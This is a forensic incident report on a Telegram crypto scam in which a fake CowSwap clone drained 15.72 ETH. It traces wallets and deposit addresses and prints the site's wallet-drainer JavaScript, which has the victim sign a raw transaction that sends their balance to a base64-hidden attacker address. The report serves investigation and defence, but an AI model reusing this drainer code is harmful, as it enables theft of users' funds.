# Telegram Social Engineering
## Case Summary
**Brief**: `Victim: Alias Redacted` was scammed out of 15.72 Ethereum via a Telegram social engineering attack. The `Victim: Alias Redacted`, was seeking mentorship in cryptocurrency trading and was contacted by an individual claiming to assist users in learning proper trade analysis and execution. This individual, going by the Telegram username `@ranacrypto10x`, requested that the user interact with an alleged "Trust Wallet" found at the `cowcrypto[.]io` website. After interacting with the scam website, the user reported observing funds exiting from their respective wallet with address `0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf` and being sent to `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`.
Event Date: **February 27, 2024**
Theft Event Ethereum Transaction:
`0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586`
#### sample from `cowcrypto[.]io`
[cowcrypto.io - urlscan.io](https://urlscan.io/result/5b32c088-ecf6-40b0-a669-ed76eca70a91/#transactions)
#### sample from `cowcrypto[.]io/swap[.]html`
[cowcrypto[.]io/swap[.]html - urlscan.io](https://urlscan.io/result/adda7ecd-9939-46b0-bd79-fefe5acc7316/#transactions)
## Address Analysis
### Address Overview
- **Scammer Wallet Address**: `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`
- **Victim Wallet Address**: `0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf`
The victim's address was reviewed for on-chain approvals and smart contract interactions, none of which were observed on the Ethereum network.
Funds were stolen on the Ethereum blockchain network with transaction hash: `0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586`
### Transactions Analysis
- Theft transaction visualization below:
```mermaid
flowchart TB
subgraph transaction
id1[0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586]
click id1 "https://app.dedaub.com/arbitrum/tx/0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586" "0x931660147c0f6e5abe8b1f19984f12f8073d20697ac75f6006764a9ca34a8586"
subgraph Sender
s_address["Address: 0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf"]
click s_address "https://app.dedaub.com/arbitrum/address/0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf/overview" "0xb43fC04B6a6cc56b0a293cC8541E7779CB058fAf"
end
id2[transfer: 15.721 Ethereum]
subgraph Recipient
r_address["Address: 0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6"]
click r_address "https://app.dedaub.com/arbitrum/address/0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6/overview" "0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6"
end
end
subgraph "Transaction Data"
evt_data["Date: 2024-02-27 \n Chain: ETH"]
end
s_address --> id2 --> r_address
```
## Associated Addresses
### Direct Associations
- List and describe addresses directly connected to the primary address(es) under investigation.
- Direct Associations Cluster:
| associated_scammer_instance_label | directly_associated_scammer_addr | potentially_associated_eth_txn |
| --- | --- | --- |
| 0x955ca4dcce379988823b24f8f289703f49ed7981 | 0x955ca4dcce379988823b24f8f289703f49ed7981 | 0xa883aca5cc2c63a4374419e62d999d6cac36afc721ded7b61c2239695a65d261 |
| 0x2ac42ceee570a60be894b933ef4d2bf6075b5dd1 | 0x2ac42ceee570a60be894b933ef4d2bf6075b5dd1 | 0xcf4a772b489236c64b39b23b2d7ce781115fb47e4f93d8fc530dff3154f96a1b |
| 0x97b29a945cfc47e014f2d0acc808a3edee87e3ac | 0x97b29a945cfc47e014f2d0acc808a3edee87e3ac | 0xff77512f20e902841f77dff6557c65207b8fdbf7d0607c091ef1fe6a18d3bf92 |
| 0x719b2202cae9f9e4171f2f1975beb47ce71d5b57 | 0x719b2202cae9f9e4171f2f1975beb47ce71d5b57 | 0x911ad4935a2a08f063767a0a4b572baccbb9f2098d1e978aae0af6300355be44 |
| 0xcc2121515b589dd1f35878669b52fe109da059a2 | 0xcc2121515b589dd1f35878669b52fe109da059a2 | 0x40920ce56d4f2941359c89e2658e485c1d9b6e39879474a713f67a47fa6465b4 |
| 0x0c06f558695e5f3e4cab286d7c5f585242d3d87e | 0x0c06f558695e5f3e4cab286d7c5f585242d3d87e | 0x1d342c7090c8562d54bf8e20130ec7a7c0e1e607ce360380d17cdce0290b452f |
### Associated Deposit Addresses
- Explore and analyze addresses indirectly connected to the primary address(es).
- Associated Deposit Addresses Cluster:
| chain | address | label | link |
| -------- | ------------------------------------------ | ------------------------------ | ------------------------------------------------------------------------------------------- |
| ethereum | 0x979f946408bf5ff7092d5c0bc901026aabfa614b | KuCoin_Deposit_0x979f | https://app.dedaub.com/ethereum/address/0x979f946408bf5ff7092d5c0bc901026aabfa614b/overview |
| ethereum | 0xc9805f23898e05c018c4b4f2550f2daeaf73e5b6 | bitrefill_dep_0xc9805f23898e05 | https://app.dedaub.com/ethereum/address/0xc9805f23898e05c018c4b4f2550f2daeaf73e5b6/overview |
| ethereum | 0x73ee457b4e36bc21965b66c5eba8ab424016e2ad | Bitrefill_Deposit_0x73ee | https://app.dedaub.com/ethereum/address/0x73ee457b4e36bc21965b66c5eba8ab424016e2ad/overview |
| ethereum | 0x392072947f76c0fcd46258d3bdfc2533f6d1ddc6 | kucoin_deposit_0x392072947f76c | https://app.dedaub.com/ethereum/address/0x392072947f76c0fcd46258d3bdfc2533f6d1ddc6/overview |
| ethereum | 0xfd4e61bd9b4156701b0a9b88dcf42489ad6c0b1e | blockchain.com_dep_0xfd4e61bd9 | https://app.dedaub.com/ethereum/address/0xfd4e61bd9b4156701b0a9b88dcf42489ad6c0b1e/overview |
| ethereum | 0x58638c40d18b2b09fb344e40ab0f8483c565a663 | Bitrefill_Deposit_0x5863 | https://app.dedaub.com/ethereum/address/0x58638c40d18b2b09fb344e40ab0f8483c565a663/overview |
| ethereum | 0xb2417b6e7ee8be01e4744d6a3627e232c64fd925 | Bitrefill_Deposit_0xb241 | https://app.dedaub.com/ethereum/address/0xb2417b6e7ee8be01e4744d6a3627e232c64fd925/overview |
| ethereum | 0x4282a7406f32e9a3b92f32fceda33ce27822425d | bitrefill_0x4282a7406f32e9a3b9 | https://app.dedaub.com/ethereum/address/0x4282a7406f32e9a3b92f32fceda33ce27822425d/overview |
## Anomalous Activity Analysis
From the victim’s Trust Wallet browser history from it can be observed that the websites interacted with were:
- `cowcrypto[.]io/swap[.]html`
- `cowcrypto[.]io/?utm_source=Trust_iOS_Browser`
Victim’s Trust Wallet browser history
## Technical Analysis
### Overall Structure of `Cowcrypto.io`
File Structure of: `cowcrypto[.]io/swap[.]html`
From a controlled deployment of the instance, it was concluded that the files of primary significance were: `connect.js` and `swap.html` . This is because `connect.js` is the javascript file containing the instructions for the website functionality when the user interacts with it. While `swap.html` is responsible for the layout of the website frontend, but also includes components defining the website interaction. Relevant samples will be addresses in greater depth below
 Sample from connect.js displaying the encoding of the malicious actors wallet address: `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6` encoded as the base64 instance: `MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2`
### Code Summary
This statement provides a detailed analysis of a sophisticated asset theft operation, which ingeniously exploits the trust of victims by impersonating the reputable cryptocurrency [“meta-DEX aggregator”](https://blog.cow.fi/how-cow-swap-solves-the-mev-problem-fd35b0127390?gi=5820b2e6ac7f#:~:text=CoW%20Swap%20is%20a%20meta,all%20AMMs%20and%20DEX%20aggregators), CowSwap.io. By misleading users into interacting with a malicious clone hosted at `cowcrypto[.]io/swap[.]html`, the attackers execute unauthorized transactions from the victims' Ethereum wallets. The provided JavaScript code snippet is a critical component of this fraudulent scheme, demonstrating the technical mechanism used to siphon Ethereum to a specific wallet address, which is encoded in base64 and decodes to `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`. It starts by utilizing the victim's web3 connected account, leveraging the Moralis API for accessing blockchain data. The code then proceeds to construct a transaction, deducting a calculated amount of Ether from the victim's balance under the guise of transaction fees, and stealthily transfers it to the attacker's wallet. This intricate process not only illustrates the depth of technical planning involved in asset theft but also highlights the critical role of digital vigilance in safeguarding against such deceptive impersonations.
```javascript=
async function l() {
const b = new Web3(Moralis['provider']);
const c = (await b["eth"]["getAccounts"]())[0];
chainId = await b["eth"]["getChainId"]();
e = await b["eth"]["getBalance"](c);
await b["eth"]["getTransactionCount"](c, "pending")["then"](async d => {
const f = await b["eth"]["getGasPrice"]();
const g = b["utils"]["toHex"](Math["floor"](f * 1.3));
const h = new b["utils"]['BN']("22000");
const i = h * Math["floor"](f * 2);
const j = e - i;
console["log"]("Sending " + b["utils"]['fromWei'](j["toString"](), "ether") + ' ETH from ' + c + '...');
// MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2 = base64 encoded: 0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6
const k = {
'nonce': b["utils"]["toHex"](d),
'gasPrice': g,
'gasLimit': "22000",
'to': atob("MHhDZGQwMWE4ZWQxQzEyNmQzMjkxRTA2OGJjOTJjMzQwN0U5YmVENkM2"),
'value': '0x' + j["toString"](16),
'data': '0x',
'v': a,
'r': '0x',
's': '0x'
};
let l = new ethereumjs['Tx'](k);
const m = '0x' + l["serialize"]()["toString"]('hex');
const n = b["utils"]['sha3'](m, {
'encoding': 'hex'
});
console["log"]("rawTx1:", m);
console["log"]("rawHash1:", n);
await b["eth"]['sign'](n, c)["then"](async a => {
const c = a["substring"](2);
const d = '0x' + c["substring"](0, 64);
const e = '0x' + c["substring"](64, 128);
const f = parseInt(c["substring"](128, 130), 16);
const g = b["utils"]['toHex'](f + chainId * 2 + 8);
console["log"]('r:', d);
console['log']('s:', e);
console["log"]('y:', g["toString"]("hex"));
l['r'] = d;
l['s'] = e;
l['v'] = g;
console["log"](l);
const h = '0x' + l["serialize"]()["toString"]("hex");
const i = b["utils"]["sha3"](h, {
'encoding': "hex"
});
console["log"]('rawTx:', h);
console['log']("rawHash:", i);
await b["eth"]["sendSignedTransaction"](h)["then"](a => console['log'](a))["catch"](a => console["log"](a));
})["catch"](a => console["log"](a));
});
}
```
### In Depth Code Analysis
The provided JavaScript snippet is part of a sophisticated mechanism designed for interacting with Ethereum blockchain and ERC-20 tokens through Web3 interfaces, with the Moralis platform as a backend service for dApp development. Here's a breakdown of its critical functionalities:
1. **ERC-20 Token Handling**: The code initializes a comprehensive interaction framework with ERC-20 tokens, specifying methods for common token operations like `transfer` and `balanceOf`. These operations are essential for dApps that intend to read token balances or initiate token transfers on behalf of the user.
2. **Web3 and Moralis Integration**: The script integrates Web3.js and Moralis, which are pivotal for establishing blockchain connections, managing account interactions, and executing blockchain transactions. Moralis provides a streamlined interface for dApp development, facilitating easy access to user wallet accounts and transaction capabilities.
3. **Phishing Mechanisms**: Central to the code is the `i()` function, which appears to conduct an automated review of the user's ERC-20 token balances and attempts to transfer out tokens to a predefined address without explicit user consent. This function, coupled with the `l()` function that orchestrates ETH transfers, suggests a phishing attempt designed to siphon assets from unsuspecting users' wallets.
4. **UI Deception**: The script manipulates UI elements to trick users into engaging with potentially harmful functionalities. It dynamically displays or hides connection buttons based on the wallet's connection status, possibly misleading users into performing actions that trigger unauthorized transactions.
5. **Stealthy Execution on Load**: The code is structured to execute these malicious activities automatically upon loading the page, reducing the likelihood that users will detect and prevent asset transfers. This stealth approach is indicative of a phishing scam aiming to maximize asset extraction before detection.
6. **Automatic Network Switching and Event Handling**: The code attempts to switch the Ethereum network to a specific chain ID if the user's wallet is connected to a different network, enhancing the script's ability to execute transactions on the intended network. Event listeners for account changes and disconnects are set up to adjust the UI and potentially reset the phishing logic, maintaining the illusion of a legitimate application.
In summary, despite utilizing legitimate Web3 and ERC-20 token interaction paradigms, the script's construction and behavior are indicative of malicious intent, specifically designed for phishing. Users are advised to exercise extreme caution and thoroughly understand the actions and permissions requested by any Web3 application or dApp before interacting with it or approving transactions. This refined analysis underscores the need for vigilance in the burgeoning space of decentralized applications and cryptocurrency transactions.
## Report Objectives
<aside>
💡 This report has been composed to the best of our knowledge and capabilities with the hopes that law enforcement could assist with potential asset recovery by the means of “freezing assets” when in the form of virtual currency asset: USDT, tether(a pattern has been observed that the malicious actor seemingly consolidates, and converts to tether approximately every three weeks or so). Moreover, we would greatly appreciate the assistance of law enforcement in engaging the exchanges of Coinbase and Binance
</aside>
## Conclusion
Currently, based on the values transacted through the **Scammer Wallet Address** `0xCdd01a8ed1C126d3291E068bc92c3407E9beD6C6`, it appears as though the victim was subject to some variant form of social engineering and potentially even phishing as a service.
## References
For a more comprehensive visual of the blockchain addresses interacted with, please refer to the graphs below:
[cowcrypto.io_color_coded](https://metasleuth.io/result/eth/0xa883aca5cc2c63a4374419e62d999d6cac36afc721ded7b61c2239695a65d261?source=a9d53d66-e721-41be-b268-3d83799f461c)
[cowcrypto.io_scammer_correlations](https://metasleuth.io/result/eth/0x685246f9fabfdaadf2cb5cbc4f989b5dff949f79a853e05857b062cdabb93809?source=0f38d99d-c184-49b1-9d3a-e5f628666463)
Sign in with Wallet
Connect another wallet